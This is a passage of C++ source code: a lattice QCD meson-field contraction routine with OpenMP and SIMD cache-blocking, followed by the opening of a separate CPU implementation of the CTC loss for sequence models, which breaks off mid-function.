template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR>
template<typename InnerProduct>
void A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>::compute(const A2AfieldL<mf_Policies> &l, const InnerProduct &M, const A2AfieldR<mf_Policies> &r, const int &t, bool do_setup){
if(do_setup) setup(l,r,t,t); //both vectors have same timeslice
else zero();
if(!UniqueID()) printf("Starting A2AmesonField::compute timeslice %d with %d threads\n",t, omp_get_max_threads());
double time = -dclock();
//For W vectors we dilute out the flavor index in-place while performing this contraction
const typename mf_Policies::FermionFieldType &mode0 = l.getMode(0);
const int size_3d = mode0.nodeSites(0)*mode0.nodeSites(1)*mode0.nodeSites(2);
if(mode0.nodeSites(3) != GJP.TnodeSites()) ERR.General("A2AmesonField","compute","Not implemented for fields where node time dimension != GJP.TnodeSites()\n");
int nl_l = lindexdilution.getNl();
int nl_r = rindexdilution.getNl();
int t_lcl = t-GJP.TnodeCoor()*GJP.TnodeSites();
if(t_lcl >= 0 && t_lcl < GJP.TnodeSites()){ //if timeslice is on-node
#pragma omp parallel for
for(int i = 0; i < nmodes_l; i++){
cps::ComplexD mf_accum;
modeIndexSet i_high_unmapped; if(i>=nl_l) lindexdilution.indexUnmap(i-nl_l,i_high_unmapped);
for(int j = 0; j < nmodes_r; j++) {
modeIndexSet j_high_unmapped; if(j>=nl_r) rindexdilution.indexUnmap(j-nl_r,j_high_unmapped);
mf_accum = 0.;
for(int p_3d = 0; p_3d < size_3d; p_3d++) {
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> lscf = l.getFlavorDilutedVect(i,i_high_unmapped,p_3d,t_lcl); //dilute flavor in-place if it hasn't been already
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> rscf = r.getFlavorDilutedVect(j,j_high_unmapped,p_3d,t_lcl);
mf_accum += M(lscf,rscf,p_3d,t); //produces double precision output by spec
}
(*this)(i,j) = mf_accum; //downcast after accumulate
}
}
}
sync();
print_time("A2AmesonField","local compute",time + dclock());
time = -dclock();
//Sum over all nodes so all nodes have a copy
nodeSum();
print_time("A2AmesonField","nodeSum",time + dclock());
}
//Compute meson fields for all timeslices. This version is more efficient on multi-nodes
#ifdef AVX512
CPS_END_NAMESPACE
#include<simd/Intel512common.h>
CPS_START_NAMESPACE
#endif
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename mf_Element, typename mf_Element_Vector>
class MultKernel{
public:
inline static void prefetchSite(const SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &lscf,
const SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &rscf){
#ifdef AVX512
_mm_prefetch((const char*)lscf.getPtr(0),_MM_HINT_T0);
_mm_prefetch((const char*)lscf.getPtr(1),_MM_HINT_T0);
_mm_prefetch((const char*)rscf.getPtr(0),_MM_HINT_T0);
_mm_prefetch((const char*)rscf.getPtr(1),_MM_HINT_T0);
#endif
}
#ifdef AVX512
static void prefetchFvec(const char* ptr){
//T0 hint
#define _VPREFETCH1(O,A) VPREFETCH1(O,A)
//T1 hint
#define _VPREFETCH2(O,A) VPREFETCH2(O,A)
__asm__ (
_VPREFETCH2(0,%rdi) \
_VPREFETCH2(1,%rdi) \
_VPREFETCH2(2,%rdi) \
_VPREFETCH2(3,%rdi) \
_VPREFETCH2(4,%rdi) \
_VPREFETCH2(5,%rdi) \
_VPREFETCH2(6,%rdi) \
_VPREFETCH2(7,%rdi) \
_VPREFETCH2(8,%rdi) \
_VPREFETCH2(9,%rdi) \
_VPREFETCH2(10,%rdi) \
_VPREFETCH2(11,%rdi)
);
}
#endif
inline static void prefetchAdvanceSite(SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &lscf,
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &rscf,
const std::pair<int,int> &site_offset_i, const std::pair<int,int> &site_offset_j){
#ifdef AVX512
lscf.incrementPointers(site_offset_i);
prefetchFvec((const char*)lscf.getPtr(0));
prefetchFvec((const char*)lscf.getPtr(1));
//_mm_prefetch((const char*)lscf.getPtr(0),_MM_HINT_T0);
//_mm_prefetch((const char*)lscf.getPtr(1),_MM_HINT_T0);
rscf.incrementPointers(site_offset_j);
prefetchFvec((const char*)rscf.getPtr(0));
prefetchFvec((const char*)rscf.getPtr(1));
//_mm_prefetch((const char*)rscf.getPtr(0),_MM_HINT_T0);
//_mm_prefetch((const char*)rscf.getPtr(1),_MM_HINT_T0);
lscf.incrementPointers(site_offset_i,-1);
rscf.incrementPointers(site_offset_j,-1);
#endif
}
inline static int prefetchSitesL2(SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &lscf,
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> &rscf){
#ifdef AVX512
_mm_prefetch((const char*)lscf.getPtr(0),_MM_HINT_T1);
_mm_prefetch((const char*)lscf.getPtr(1),_MM_HINT_T1);
_mm_prefetch((const char*)rscf.getPtr(0),_MM_HINT_T1);
_mm_prefetch((const char*)rscf.getPtr(1),_MM_HINT_T1);
return 5; //number of sites between calls
#endif
}
//Lowest level of blocked matrix mult. Ideally this should fit in L1 cache.
template<typename InnerProduct>
static void mult_kernel(std::vector<mf_Element_Vector> &mf_accum_m, const InnerProduct &M, const int t,
const int i0, const int iup, const int j0, const int jup, const int p0, const int pup,
const std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > &base_ptrs_i,
const std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > &base_ptrs_j,
const std::vector<std::pair<int,int> > &site_offsets_i,
const std::vector<std::pair<int,int> > &site_offsets_j){
for(int i = i0; i < iup; i++){
for(int j = j0; j < jup; j++) {
mf_Element &mf_accum = mf_accum_m[i][j];
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> lscf(base_ptrs_i[i], site_offsets_i[i], p0);
SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> rscf(base_ptrs_j[j], site_offsets_j[j], p0);
//prefetchSite(lscf,rscf);
//prefetchSitesL2(lscf,rscf);
//int L2prefetchFreq = 1;
//int iter = 0;
for(int p_3d = p0; p_3d < pup; p_3d++) {
//if(iter % L2prefetchFreq == 0) L2prefetchFreq = prefetchSitesL2(lscf,rscf);
//prefetchAdvanceSite(lscf,rscf,site_offsets_i[i],site_offsets_j[j]);
M(mf_accum,lscf,rscf,p_3d,t);
lscf.incrementPointers(site_offsets_i[i]);
rscf.incrementPointers(site_offsets_j[j]);
//++iter;
}
}
}
}
//Do a second layer of blocked dgemm to try to fit in the L1 cache
//note the i0, iup, etc are the low and high range limits from the outer blocking
template<typename InnerProduct>
static void inner_block_mult(std::vector<mf_Element_Vector> &mf_accum_m, const InnerProduct &M, const int t,
const int i0, const int iup, const int j0, const int jup, const int p0, const int pup,
const std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > &base_ptrs_i,
const std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > &base_ptrs_j,
const std::vector<std::pair<int,int> > &site_offsets_i,
const std::vector<std::pair<int,int> > &site_offsets_j){
const int bii = BlockedMesonFieldArgs::bii;
const int bjj = BlockedMesonFieldArgs::bjj;
const int bpp = BlockedMesonFieldArgs::bpp;
for(int ii0=i0; ii0 < iup; ii0+=bii){
int iiup = std::min(ii0+bii,iup);
for(int jj0=j0; jj0 < jup; jj0+=bjj){
int jjup = std::min(jj0+bjj,jup);
for(int pp0=p0; pp0 < pup; pp0+=bpp){
int ppup = std::min(pp0+bpp,pup);
MultKernel<mf_Policies,A2AfieldL,A2AfieldR,mf_Element,mf_Element_Vector>::mult_kernel(mf_accum_m, M, t,
ii0, iiup, jj0, jjup, pp0, ppup,
base_ptrs_i, base_ptrs_j, site_offsets_i, site_offsets_j);
}
}
}
}
};
//Policies for single and multi-src outputs
//Single src
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename Allocator, typename InnerProduct>
struct SingleSrcVectorPolicies{
typedef std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator > mfVectorType;
typedef cps::ComplexD mf_Element;
typedef std::vector<mf_Element> mf_Element_Vector;
static inline void setupPolicy(const InnerProduct &M){ assert(M.mfPerTimeSlice() == 1); }
static inline void initializeElement(mf_Element &e){ e = mf_Element(0.); }
static void initializeMesonFields(mfVectorType &mf_t, const A2AfieldL<mf_Policies> &l, const A2AfieldR<mf_Policies> &r, const int Lt, const bool do_setup){
mf_t.resize(Lt);
for(int t=0;t<Lt;t++)
if(do_setup) mf_t[t].setup(l,r,t,t); //both vectors have same timeslice (zeroes the starting matrix)
else{
assert(mf_t[t].ptr() != NULL);
mf_t[t].zero();
}
}
static inline void sumThreadedResults(mfVectorType &mf_t, const std::vector<std::vector<mf_Element_Vector> > &mf_accum_thr, const int i, const int j, const int t, const int nthread){
for(int thr=0;thr<nthread;thr++)
mf_t[t](i,j) += mf_accum_thr[thr][i][j];
}
//Used to get information about rows and cols
static inline const A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR> & getReferenceMf(const mfVectorType &mf_t, const int t){
return mf_t[t];
}
static inline void nodeSum(mfVectorType &mf_t, const int Lt){
for(int t=0; t<Lt; t++) mf_t[t].nodeSum();
}
static inline void printElement(const mf_Element &e){
std::cout << "(" << e.real() << "," << e.imag() << ")";
}
};
//Multisrc
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename Allocator, typename InnerProduct>
struct MultiSrcVectorPolicies{
int mfPerTimeSlice;
typedef std::vector< std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator >* > mfVectorType; //indexed by [srcidx][t]
typedef std::vector<cps::ComplexD> mf_Element;
typedef std::vector<mf_Element> mf_Element_Vector;
inline void setupPolicy(const InnerProduct &M){
mfPerTimeSlice = M.mfPerTimeSlice();
}
inline void initializeElement(mf_Element &e){ e.resize(mfPerTimeSlice, cps::ComplexD(0.)); }
void initializeMesonFields(mfVectorType &mf_st, const A2AfieldL<mf_Policies> &l, const A2AfieldR<mf_Policies> &r, const int Lt, const bool do_setup) const{
if(mf_st.size() != mfPerTimeSlice) ERR.General("mf_Vector_policies <multi src>","initializeMesonFields","Expect output vector to be of size %d, got size %d\n",mfPerTimeSlice,mf_st.size());
for(int s=0;s<mfPerTimeSlice;s++){
mf_st[s]->resize(Lt);
for(int t=0;t<Lt;t++)
if(do_setup) mf_st[s]->operator[](t).setup(l,r,t,t); //both vectors have same timeslice (zeroes the starting matrix)
else{
assert(mf_st[s]->operator[](t).ptr() != NULL);
mf_st[s]->operator[](t).zero();
}
}
}
inline void sumThreadedResults(mfVectorType &mf_st, const std::vector<std::vector<mf_Element_Vector> > &mf_accum_thr, const int i, const int j, const int t, const int nthread) const{
for(int thr=0;thr<nthread;thr++)
for(int s=0;s<mfPerTimeSlice;s++)
mf_st[s]->operator[](t)(i,j) += mf_accum_thr[thr][i][j][s];
}
//Used to get information about rows and cols
inline const A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR> & getReferenceMf(const mfVectorType &mf_st, const int t) const{
return mf_st[0]->operator[](t);
}
inline void nodeSum(mfVectorType &mf_st, const int Lt) const{
for(int s=0;s<mfPerTimeSlice;s++)
for(int t=0; t<Lt; t++) mf_st[s]->operator[](t).nodeSum();
}
inline void printElement(const mf_Element &e) const{
for(int i=0;i<mfPerTimeSlice;i++) std::cout << i << ":(" << e[i].real() << "," << e[i].imag() << ") ";
}
};
#ifdef USE_GRID
//Single src vectorized with delayed reduction
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename Allocator, typename InnerProduct>
struct SingleSrcVectorPoliciesSIMD{
typedef std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator > mfVectorType;
typedef Grid::vComplexD mf_Element;
typedef Grid::Vector<mf_Element> mf_Element_Vector;
static inline void setupPolicy(const InnerProduct &M){ assert(M.mfPerTimeSlice() == 1); }
static inline void initializeElement(mf_Element &e){ zeroit(e); }
static void initializeMesonFields(mfVectorType &mf_t, const A2AfieldL<mf_Policies> &l, const A2AfieldR<mf_Policies> &r, const int Lt, const bool do_setup){
mf_t.resize(Lt);
for(int t=0;t<Lt;t++)
if(do_setup) mf_t[t].setup(l,r,t,t); //both vectors have same timeslice (zeroes the starting matrix)
else{
assert(mf_t[t].ptr() != NULL);
mf_t[t].zero();
}
}
static inline void sumThreadedResults(mfVectorType &mf_t, const std::vector<std::vector<mf_Element_Vector> > &mf_accum_thr, const int i, const int j, const int t, const int nthread){
mf_Element tmp = mf_accum_thr[0][i][j];
for(int thr=1;thr<nthread;thr++) tmp += mf_accum_thr[thr][i][j];
mf_t[t](i,j) += Reduce(tmp);
}
//Used to get information about rows and cols
static inline const A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR> & getReferenceMf(const mfVectorType &mf_t, const int t){
return mf_t[t];
}
static inline void nodeSum(mfVectorType &mf_t, const int Lt){
for(int t=0; t<Lt; t++) mf_t[t].nodeSum();
}
static inline void printElement(const mf_Element &e){
}
};
//Multisrc with delayed reduction
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename Allocator, typename InnerProduct>
struct MultiSrcVectorPoliciesSIMD{
int mfPerTimeSlice;
typedef std::vector< std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator >* > mfVectorType; //indexed by [srcidx][t]
typedef Grid::Vector<Grid::vComplexD> mf_Element;
typedef std::vector<mf_Element> mf_Element_Vector;
inline void setupPolicy(const InnerProduct &M){
mfPerTimeSlice = M.mfPerTimeSlice();
}
inline void initializeElement(mf_Element &e){
e.resize(mfPerTimeSlice);
for(int i=0;i<mfPerTimeSlice;i++) zeroit(e[i]);
}
void initializeMesonFields(mfVectorType &mf_st, const A2AfieldL<mf_Policies> &l, const A2AfieldR<mf_Policies> &r, const int Lt, const bool do_setup) const{
if(mf_st.size() != mfPerTimeSlice) ERR.General("mf_Vector_policies <multi src>","initializeMesonFields","Expect output vector to be of size %d, got size %d\n",mfPerTimeSlice,mf_st.size());
for(int s=0;s<mfPerTimeSlice;s++){
mf_st[s]->resize(Lt);
for(int t=0;t<Lt;t++)
if(do_setup) mf_st[s]->operator[](t).setup(l,r,t,t); //both vectors have same timeslice (zeroes the starting matrix)
else{
assert(mf_st[s]->operator[](t).ptr() != NULL);
mf_st[s]->operator[](t).zero();
}
}
}
inline void sumThreadedResults(mfVectorType &mf_st, const std::vector<std::vector<mf_Element_Vector> > &mf_accum_thr, const int i, const int j, const int t, const int nthread) const{
mf_Element tmp(mfPerTimeSlice);
for(int s=0;s<mfPerTimeSlice;s++) tmp[s] = mf_accum_thr[0][i][j][s];
for(int thr=1;thr<nthread;thr++)
for(int s=0;s<mfPerTimeSlice;s++)
tmp[s] += mf_accum_thr[thr][i][j][s];
for(int s=0;s<mfPerTimeSlice;s++)
mf_st[s]->operator[](t)(i,j) += Reduce(tmp[s]);
}
//Used to get information about rows and cols
inline const A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR> & getReferenceMf(const mfVectorType &mf_st, const int t) const{
return mf_st[0]->operator[](t);
}
inline void nodeSum(mfVectorType &mf_st, const int Lt) const{
for(int s=0;s<mfPerTimeSlice;s++)
for(int t=0; t<Lt; t++) mf_st[s]->operator[](t).nodeSum();
}
inline void printElement(const mf_Element &e) const{
//for(int i=0;i<mfPerTimeSlice;i++) std::cout << i << ":(" << e[i].real() << "," << e[i].imag() << ") ";
}
};
#endif
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename InnerProduct, typename mfVectorPolicies>
struct mfComputeGeneral: public mfVectorPolicies{
typedef typename mfVectorPolicies::mfVectorType mfVectorType;
void compute(mfVectorType &mf_t, const A2AfieldL<mf_Policies> &l, const InnerProduct &M, const A2AfieldR<mf_Policies> &r, bool do_setup){
typedef typename mfVectorPolicies::mf_Element mf_Element;
typedef typename mfVectorPolicies::mf_Element_Vector mf_Element_Vector;
this->setupPolicy(M);
const int Lt = GJP.Tnodes()*GJP.TnodeSites();
if(!UniqueID()) printf("Starting A2AmesonField::compute (blocked) for %d timeslices with %d threads\n",Lt, omp_get_max_threads());
#ifdef KNL_OPTIMIZATIONS
if(!UniqueID()) printf("Using KNL optimizations\n");
#else
if(!UniqueID()) printf("NOT using KNL optimizations\n");
#endif
double time = -dclock();
this->initializeMesonFields(mf_t,l,r,Lt,do_setup);
print_time("A2AmesonField","setup",time + dclock());
time = -dclock();
//For W vectors we dilute out the flavor index in-place while performing this contraction
const typename mf_Policies::FermionFieldType &mode0 = l.getMode(0);
const int size_3d = mode0.nodeSites(0)*mode0.nodeSites(1)*mode0.nodeSites(2);
if(mode0.nodeSites(3) != GJP.TnodeSites()) ERR.General("A2AmesonField","compute","Not implemented for fields where node time dimension != GJP.TnodeSites()\n");
//Each node only works on its time block
for(int t=GJP.TnodeCoor()*GJP.TnodeSites(); t<(GJP.TnodeCoor()+1)*GJP.TnodeSites(); t++){
const A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR> & mf_ref = this->getReferenceMf(mf_t,t); //assumes all meson fields of the mf_Element type have the same mode parameters
double ttime = -dclock();
const int nl_l = mf_ref.getRowParams().getNl();
const int nl_r = mf_ref.getColParams().getNl();
const int nmodes_l = mf_ref.getNrows();
const int nmodes_r = mf_ref.getNcols();
int t_lcl = t-GJP.TnodeCoor()*GJP.TnodeSites();
const int bi = BlockedMesonFieldArgs::bi;
const int bj = BlockedMesonFieldArgs::bj;
const int bp = BlockedMesonFieldArgs::bp;
int nthread = omp_get_max_threads();
std::vector<std::vector<mf_Element_Vector> > mf_accum_thr(nthread); //indexed by [thread][i][j]
for(int thr=0;thr<nthread;thr++){
mf_accum_thr[thr].resize(nmodes_l);
for(int i=0;i<nmodes_l;i++){
mf_accum_thr[thr][i].resize(nmodes_r);
for(int j=0;j<nmodes_r;j++)
this->initializeElement(mf_accum_thr[thr][i][j]);
}
}
//Make a table of p base pointers and site offsets for each i,j
std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > base_ptrs_i(nmodes_l);
std::vector<SCFvectorPtr<typename mf_Policies::FermionFieldType::FieldSiteType> > base_ptrs_j(nmodes_r);
std::vector<std::pair<int,int> > site_offsets_i(nmodes_l);
std::vector<std::pair<int,int> > site_offsets_j(nmodes_r);
__SSC_MARK(0x1);
#pragma omp parallel
{
int me = omp_get_thread_num();
//Generate the tables
int thr_tabwork, thr_taboff;
thread_work(thr_tabwork, thr_taboff, nmodes_l, me, omp_get_num_threads());
for(int i=thr_taboff; i<thr_taboff+thr_tabwork;i++){ //i table
modeIndexSet i_high_unmapped; if(i>=nl_l) mf_ref.getRowParams().indexUnmap(i-nl_l,i_high_unmapped);
base_ptrs_i[i] = l.getFlavorDilutedVect(i,i_high_unmapped,0,t_lcl);
site_offsets_i[i] = std::pair<int,int>( l.siteStride3D(i,i_high_unmapped,0), l.siteStride3D(i,i_high_unmapped,1) );
}
thread_work(thr_tabwork, thr_taboff, nmodes_r, me, omp_get_num_threads());
for(int j=thr_taboff; j<thr_taboff+thr_tabwork;j++){ //j table
modeIndexSet j_high_unmapped; if(j>=nl_r) mf_ref.getColParams().indexUnmap(j-nl_r,j_high_unmapped);
base_ptrs_j[j] = r.getFlavorDilutedVect(j,j_high_unmapped,0,t_lcl);
site_offsets_j[j] = std::pair<int,int>( r.siteStride3D(j,j_high_unmapped,0), r.siteStride3D(j,j_high_unmapped,1) );
}
#pragma omp barrier
for(int i0 = 0; i0 < nmodes_l; i0+=bi){
int iup = std::min(i0+bi,nmodes_l);
for(int j0 = 0; j0< nmodes_r; j0+=bj) {
int jup = std::min(j0+bj,nmodes_r);
for(int p0 = 0; p0 < size_3d; p0+=bp){
int pup = std::min(p0+bp,size_3d);
int thr_pwork, thr_poff;
thread_work(thr_pwork, thr_poff, pup-p0, me, omp_get_num_threads());
int thr_p0 = p0 + thr_poff;
#ifdef USE_INNER_BLOCKING
MultKernel<mf_Policies,A2AfieldL,A2AfieldR,mf_Element,mf_Element_Vector>::inner_block_mult(mf_accum_thr[me], M, t,
i0, iup, j0, jup, thr_p0, thr_p0+thr_pwork,
base_ptrs_i, base_ptrs_j, site_offsets_i, site_offsets_j);
#else
MultKernel<mf_Policies,A2AfieldL,A2AfieldR,mf_Element,mf_Element_Vector>::mult_kernel(mf_accum_thr[me], M, t,
i0, iup, j0, jup, thr_p0, thr_p0+thr_pwork,
base_ptrs_i, base_ptrs_j, site_offsets_i, site_offsets_j);
#endif
}
}
}
#pragma omp barrier
const int nthread = omp_get_num_threads();
const int ijwork = nmodes_l * nmodes_r;
int thr_ijwork, thr_ijoff;
thread_work(thr_ijwork, thr_ijoff, ijwork, me, nthread);
for(int ij=thr_ijoff; ij<thr_ijoff + thr_ijwork; ij++){ //ij = j + mf_t[t].nmodes_r * i
int i=ij / nmodes_r;
int j=ij % nmodes_r;
this->sumThreadedResults(mf_t,mf_accum_thr,i,j,t,nthread);
}
}//end of parallel region
__SSC_MARK(0x2);
std::ostringstream os; os << "timeslice " << t << " from range " << GJP.TnodeCoor()*GJP.TnodeSites() << " to " << (GJP.TnodeCoor()+1)*GJP.TnodeSites()-1 << " : " << nmodes_l << "*" << nmodes_r << " modes and inner p loop of size " << size_3d << " divided over " << omp_get_max_threads() << " threads";
print_time("A2AmesonField",os.str().c_str(),ttime + dclock());
}
print_time("A2AmesonField","local compute",time + dclock());
time = -dclock();
sync();
print_time("A2AmesonField","sync",time + dclock());
//Accumulate
time = -dclock();
this->nodeSum(mf_t,Lt);
print_time("A2AmesonField","nodeSum",time + dclock());
}
};
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename InnerProduct, typename Allocator, typename ComplexClass>
struct _choose_vector_policies{};
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename InnerProduct, typename Allocator>
struct _choose_vector_policies<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct,Allocator,complex_double_or_float_mark>{
typedef SingleSrcVectorPolicies<mf_Policies, A2AfieldL, A2AfieldR, Allocator, InnerProduct> SingleSrcVectorPoliciesT;
typedef MultiSrcVectorPolicies<mf_Policies, A2AfieldL, A2AfieldR, Allocator, InnerProduct> MultiSrcVectorPoliciesT;
};
#ifdef USE_GRID
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR, typename InnerProduct, typename Allocator>
struct _choose_vector_policies<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct,Allocator,grid_vector_complex_mark>{
typedef SingleSrcVectorPoliciesSIMD<mf_Policies, A2AfieldL, A2AfieldR, Allocator, InnerProduct> SingleSrcVectorPoliciesT;
typedef MultiSrcVectorPoliciesSIMD<mf_Policies, A2AfieldL, A2AfieldR, Allocator, InnerProduct> MultiSrcVectorPoliciesT;
};
#endif
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR>
template<typename InnerProduct, typename Allocator>
void A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>::compute(std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator > &mf_t,
const A2AfieldL<mf_Policies> &l, const InnerProduct &M, const A2AfieldR<mf_Policies> &r, bool do_setup){
typedef typename _choose_vector_policies<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct,Allocator, typename ComplexClassify<typename mf_Policies::ComplexType>::type>::SingleSrcVectorPoliciesT VectorPolicies;
mfComputeGeneral<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct, VectorPolicies> cg;
cg.compute(mf_t,l,M,r,do_setup);
}
//Version of the above for multi-src inner products (output vector indexed by [src idx][t]
template<typename mf_Policies, template <typename> class A2AfieldL, template <typename> class A2AfieldR>
template<typename InnerProduct, typename Allocator>
void A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>::compute(std::vector< std::vector<A2AmesonField<mf_Policies,A2AfieldL,A2AfieldR>, Allocator >* > &mf_st,
const A2AfieldL<mf_Policies> &l, const InnerProduct &M, const A2AfieldR<mf_Policies> &r, bool do_setup){
typedef typename _choose_vector_policies<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct,Allocator, typename ComplexClassify<typename mf_Policies::ComplexType>::type>::MultiSrcVectorPoliciesT VectorPolicies;
mfComputeGeneral<mf_Policies,A2AfieldL,A2AfieldR,InnerProduct, VectorPolicies> cg;
cg.compute(mf_st,l,M,r,do_setup);
}
#endif
|
cpu_ctc.h | #pragma once
#include <tuple>
#include <cmath>
#include <limits>
#include <algorithm>
#include <numeric>
#if !defined(CTC_DISABLE_OMP) && !defined(APPLE)
#include <omp.h>
#endif
#include "ctc_helper.h"
template<typename ProbT>
class CpuCTC {
public:
// Noncopyable
CpuCTC(int alphabet_size, int minibatch, void* workspace, int num_threads,
int blank_label) :
alphabet_size_(alphabet_size), minibatch_(minibatch),
num_threads_(num_threads), workspace_(workspace),
blank_label_(blank_label) {
#if defined(CTC_DISABLE_OMP) || defined(APPLE)
#else
if (num_threads > 0) {
omp_set_num_threads(num_threads);
} else {
num_threads_ = omp_get_max_threads();
}
#endif
};
CpuCTC(const CpuCTC&) = delete;
CpuCTC& operator=(const CpuCTC&) = delete;
ctcStatus_t cost_and_grad(const ProbT* const probs,
ProbT *grads,
ProbT* costs,
const int* const flat_labels,
const int* const label_lengths,
const int* const input_lengths);
ctcStatus_t score_forward(const ProbT* const probs,
ProbT* costs,
const int* const flat_labels,
const int* const label_lengths,
const int* const input_lengths);
private:
class CpuCTC_metadata {
private:
int setup_labels(const int* const labels, int blank_label, int L, int S);
public:
CpuCTC_metadata(int L, int S, int T, int mb, int alphabet_size,
void* workspace, size_t bytes_used, int blank_label,
const int* const labels);
ProbT* alphas;
ProbT* betas;
int* labels_w_blanks;
int* e_inc;
int* s_inc;
ProbT* output;
int repeats;
};
int alphabet_size_; // Number of characters plus blank
int minibatch_;
int num_threads_;
int blank_label_;
void* workspace_;
std::tuple<ProbT, bool>
cost_and_grad_kernel(ProbT *grad, const ProbT* const probs,
const int* const labels, int T, int L,
int mb, size_t bytes_used);
ProbT compute_alphas(const ProbT* probs, int repeats, int S, int T,
const int* const e_inc,
const int* const s_inc,
const int* const labels,
ProbT* alphas);
ProbT compute_betas_and_grad(ProbT* grad, const ProbT* const probs,
ProbT log_partition, int repeats,
int S, int T, const int* const e_inc,
const int* const s_inc,
const int* const labels,
ProbT* alphas,
ProbT* betas,
ProbT* output);
};
template<typename ProbT>
CpuCTC<ProbT>::CpuCTC_metadata::CpuCTC_metadata(int L, int S, int T, int mb,
int alphabet_size,
void* workspace, size_t bytes_used,
int blank_label,
const int* const labels) {
alphas = reinterpret_cast<ProbT *>(static_cast<char *>(workspace) + bytes_used);
bytes_used += sizeof(ProbT) * S * T;
std::fill(alphas, alphas + S * T, ctc_helper::neg_inf<ProbT>());
betas = reinterpret_cast<ProbT *>(static_cast<char *>(workspace) + bytes_used);
bytes_used += sizeof(ProbT) * S;
std::fill(betas, betas + S, ctc_helper::neg_inf<ProbT>());
labels_w_blanks = reinterpret_cast<int *>(static_cast<char *>(workspace) + bytes_used);
bytes_used += sizeof(int) * S;
e_inc = reinterpret_cast<int *>(static_cast<char *>(workspace) + bytes_used);
bytes_used += sizeof(int) * S;
s_inc = reinterpret_cast<int *>(static_cast<char *>(workspace) + bytes_used);
bytes_used += sizeof(int) * S;
output = reinterpret_cast<ProbT *>(static_cast<char *>(workspace) + bytes_used);
bytes_used += sizeof(ProbT) * alphabet_size;
repeats = setup_labels(labels, blank_label, L, S);
}
template<typename ProbT>
int CpuCTC<ProbT>::CpuCTC_metadata::setup_labels(const int* const labels,
int blank_label, int L, int S) {
int e_counter = 0;
int s_counter = 0;
s_inc[s_counter++] = 1;
int repeats = 0;
for (int i = 1; i < L; ++i) {
if (labels[i-1] == labels[i]) {
s_inc[s_counter++] = 1;
s_inc[s_counter++] = 1;
e_inc[e_counter++] = 1;
e_inc[e_counter++] = 1;
++repeats;
}
else {
s_inc[s_counter++] = 2;
e_inc[e_counter++] = 2;
}
}
e_inc[e_counter++] = 1;
for (int i = 0; i < L; ++i) {
labels_w_blanks[2 * i] = blank_label;
labels_w_blanks[2 * i + 1] = labels[i];
}
labels_w_blanks[S - 1] = blank_label;
return repeats;
}
template<typename ProbT>
std::tuple<ProbT, bool>
CpuCTC<ProbT>::cost_and_grad_kernel(ProbT *grad, const ProbT* const probs,
const int* const labels,
int T, int L, int mb, size_t bytes_used) {
const int S = 2*L + 1; // Number of labels with blanks
CpuCTC_metadata ctcm(L, S, T, mb, alphabet_size_, workspace_, bytes_used, blank_label_, labels);
bool over_threshold = false;
if (L + ctcm.repeats > T) {
return std::make_tuple(ProbT(0), over_threshold); // TODO, not right to return 0
}
ProbT llForward = compute_alphas(probs, ctcm.repeats, S, T, ctcm.e_inc,
ctcm.s_inc, ctcm.labels_w_blanks,
ctcm.alphas);
ProbT llBackward = compute_betas_and_grad(grad, probs, llForward, ctcm.repeats,
S, T, ctcm.e_inc, ctcm.s_inc,
ctcm.labels_w_blanks,
ctcm.alphas,
ctcm.betas,
ctcm.output);
ProbT diff = std::abs(llForward - llBackward);
if (diff > ctc_helper::threshold) {
over_threshold = true;
}
return std::make_tuple(-llForward, over_threshold);
}
// Computes forward probabilities
template<typename ProbT>
ProbT CpuCTC<ProbT>::compute_alphas(const ProbT* probs, int repeats, int S, int T,
const int* const e_inc,
const int* const s_inc,
const int* const labels,
ProbT* alphas) {
int start = (((S /2) + repeats - T) < 0) ? 0 : 1,
end = S > 1 ? 2 : 1;
for (int i = start; i < end; ++i) {
